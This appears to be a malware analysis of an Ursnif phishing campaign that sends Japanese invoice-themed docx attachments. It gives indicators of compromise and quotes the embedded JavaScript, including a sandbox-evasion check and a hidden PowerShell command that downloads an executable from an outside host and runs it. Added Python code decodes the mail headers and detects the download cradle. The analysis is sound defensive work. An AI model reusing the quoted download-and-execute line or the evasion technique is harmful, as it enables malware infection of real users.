Malware Delivery Method
docx attachment in email
Execution process
attached docx opened -> embedded JavaScript executes -> JavaScript launches PowerShell, which connects to the internet -> payload downloaded over HTTPS
Example:
Document sent as an attachment in the following email:
Subject: =?iso-2022-jp?B?OBskQjduISI4NjJBQEE1YT1xJEckOSEjGyhC?=
From: =?iso-2022-jp?B?GyRCQTBFRBsoQiAbJEJCc0thGyhC?= <[email protected]>
To: <[email protected]>
Original attachment name: 原価請求書です277253.docx ("copy of Invoice" when translated)
MD5 hash: 85d09006634ab5f2138ac927997accda
Below are the unique sender email addresses observed in this Ursnif campaign delivering the malicious documents as email attachments:
[email protected]
[email protected]
[email protected]
And below are the spoofed addresses:
[email protected]
[email protected]
[email protected]
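The Subject and From headers above are RFC 2047 encoded-words (=?iso-2022-jp?B?...?=), which mail gateways and SIEMs often log undecoded, so a triage step that decodes them is worth having. The following is an added example, not code from the original post: it decodes the two encoded-words shown on the page with Python's standard library. The mailbox addresses in the sample are constructed placeholders, since the page redacts them, and the sample header block is embedded inline so the script runs offline.

```python
from email.header import decode_header
from email.parser import HeaderParser

# Constructed sample: the Subject and From encoded-words are the ones shown on the
# page; the mailbox addresses are placeholders because the page redacts them.
SAMPLE_HEADERS = (
    "Subject: =?iso-2022-jp?B?OBskQjduISI4NjJBQEE1YT1xJEckOSEjGyhC?=\n"
    "From: =?iso-2022-jp?B?GyRCQTBFRBsoQiAbJEJCc0thGyhC?= <sender@example.invalid>\n"
    "To: <recipient@example.invalid>\n"
)


def decode_rfc2047(value: str) -> str:
    """Decode RFC 2047 encoded-words (=?charset?B?...?=) into readable text.

    decode_header() splits the value into (bytes, charset) chunks; plain text
    between encoded-words comes back as bytes with charset None, so it is
    decoded as ASCII. Undecodable bytes are replaced rather than raising, and an
    unknown charset label falls back to latin-1, so a malformed header cannot
    crash the triage step.
    """
    parts = []
    for chunk, charset in decode_header(value):
        if isinstance(chunk, bytes):
            try:
                parts.append(chunk.decode(charset or "ascii", errors="replace"))
            except LookupError:  # charset label Python does not know
                parts.append(chunk.decode("latin-1"))
        else:
            parts.append(chunk)
    return "".join(parts)


def decoded_headers(raw_headers: str) -> dict:
    """Parse a header block and return every header with encoded-words decoded."""
    msg = HeaderParser().parsestr(raw_headers)
    return {name: decode_rfc2047(value) for name, value in msg.items()}


if __name__ == "__main__":
    for name, value in decoded_headers(SAMPLE_HEADERS).items():
        print(f"{name}: {value}")
```

Decoding shows that the subject uses the same 請求書 (invoice) wording as the attachment name, which is useful when writing a mail-filter rule: match on the decoded text rather than on the base64 blob, which changes with every spelling variant.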
Embedded JavaScript in the docx performs the following tasks:
- Detects sleep short-circuiting (a sandbox technique that makes Sleep return immediately) by comparing the second-of-minute values read before and after the Sleep call:
// The method name "getSeconds" is assembled from fragments to hinder static string matching
piUCkfeTbuHWBQdaRl = "getS" + "ec" + "onds";
// Seconds value before sleeping
TJoMcZPXpCNhHVlsn = new Date()[piUCkfeTbuHWBQdaRl]();
WScript.Sleep(1000);
// Seconds value after sleeping; if the two values are equal, the sleep was short-circuited
// (note that getSeconds wraps at 60, so this check is unreliable across a minute boundary)
qWBKNMtLEHISpva = new Date()[piUCkfeTbuHWBQdaRl]();
- If sleep short-circuiting is not detected, the JavaScript launches PowerShell to download the malicious payload over HTTPS, as shown below:
// lhzYcTRDtUorLVmdP is presumably a Shell.Application object; the final argument 0 (SW_HIDE) hides the command window
lhzYcTRDtUorLVmdP.ShellExecute("cmd.eXE", "/c ping localhost & powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('https://aedwards.co/wp-includes/IXR/get.php?jgTbz','%appdata%xJr23.eXe'); sTarT-PROcess '%appdAta%xJr23.exe'", "", "open", 0);
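The command line above combines several traits that rarely appear together in legitimate PowerShell use (execution-policy bypass, hidden window, a WebClient download into %appdata%, then Start-Process of that file), and it mixes letter case ("cmd.eXE", "sTarT-PROcess") to defeat exact-string matching. The following is an added example, not code from the original post, that scores process-creation records (Sysmon Event ID 1 style fields: parent image, image, command line) against those traits case-insensitively. The sample events, the download URL and the dropped filename in them are constructed to mirror the page's command line, not taken from it.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (fields as in a Sysmon Event ID 1)."""
    parent_image: str
    image: str
    command_line: str


# Traits of the download cradle shown on the page. All matching is case-insensitive
# because the sample mixes case to defeat naive string matching.
CRADLE_INDICATORS = {
    "executionpolicy_bypass": re.compile(r"-executionpolicy\s+bypass", re.I),
    "noprofile": re.compile(r"-noprofile\b", re.I),
    "hidden_window": re.compile(r"-windowstyle\s+hidden", re.I),
    "webclient_downloadfile": re.compile(
        r"new-object\s+(?:system\.)?net\.webclient\)?\s*\.downloadfile", re.I),
    "drop_in_appdata": re.compile(r"%appdata%[^'\"\s]*\.exe", re.I),
    "start_process": re.compile(r"\bstart-process\b", re.I),
}

# Script/shell hosts an Office-delivered script typically chains through.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_indicators(command_line: str) -> list:
    """Names of every cradle trait present in the command line."""
    return [name for name, rx in CRADLE_INDICATORS.items() if rx.search(command_line)]


def assess(event: ProcessEvent, threshold: int = 3) -> dict:
    """Flag an event when PowerShell is invoked with several cradle traits at once.

    A single trait (say, -ExecutionPolicy Bypass in an admin script) is common,
    so the verdict needs at least `threshold` traits in one PowerShell launch.
    The parent is reported separately: a script host spawning the chain is
    strong supporting context but not required for the verdict.
    """
    hits = match_indicators(event.command_line)
    invokes_powershell = ("powershell" in event.command_line.lower()
                          or basename(event.image) == "powershell.exe")
    return {
        "suspicious": invokes_powershell and len(hits) >= threshold,
        "indicators": hits,
        "parent_is_script_host": basename(event.parent_image) in SCRIPT_HOSTS,
        "image": basename(event.image),
    }


# Constructed sample events. The first mirrors the page's cradle with a placeholder
# URL and filename; the other two are ordinary PowerShell launches.
SAMPLE_EVENTS = [
    ProcessEvent(
        parent_image=r"C:\Windows\System32\wscript.exe",
        image=r"C:\Windows\System32\cmd.exe",
        command_line=(
            "cmd.eXE /c ping localhost & powershell.exe -executionpolicy bypass -noprofile "
            "-windowstyle hidden (new-object system.net.webclient).downloadfile("
            "'https://downloader.example.invalid/get.php?x','%appdata%\\dropper.exe'); "
            "sTarT-PROcess '%appdAta%\\dropper.exe'"
        ),
    ),
    ProcessEvent(
        parent_image=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line="powershell.exe -NoProfile -Command Get-ChildItem C:\\Logs",
    ),
    ProcessEvent(
        parent_image=r"C:\Windows\System32\services.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line="powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1",
    ),
]


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(assess(event))
```

The threshold keeps the rule from firing on routine admin scripts while still catching the full chain; in a real deployment the cmd.exe event carries the whole line (as in the first sample) and the child powershell.exe event carries its own, so both get scored and either is enough.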
MD5 hash of the downloaded payload:
c0b7897f69f0a68297969c709cac576d
After execution, the downloaded payload makes the following network callback:
antispam.city/images/Ncd0ce3MW_2Br1/2xSMfrx83BhD9VwVpJlrz/Vcj4Y3fgOgnnRFQY/b5MMsaAEnTYFOQb/9smbf8JBZRu4uT2DPA/m3IUcDt7p/eRM513X067tKgbFbFUAP/CgywchBtV2v2M3vHdCF/Pye9qtR5e88uvj4d5msIyY/XHeVYOb9Z5pcC/GutfKuT3/w_2Bd1EzlOjZGmrVBuR7_2F/waO8u_2BBp/YC_2FNg9W/K92jQnG.jpeg
Interesting callback domain name:
antispam.city (how ironic)
Whois information shows that this domain was registered only recently, on 14th August 2017.
Ref:
https://www.virustotal.com/#/file/f05f940d70b4a90908e3f0517cf581ed9d83264548577393464f781f24882cd5/detection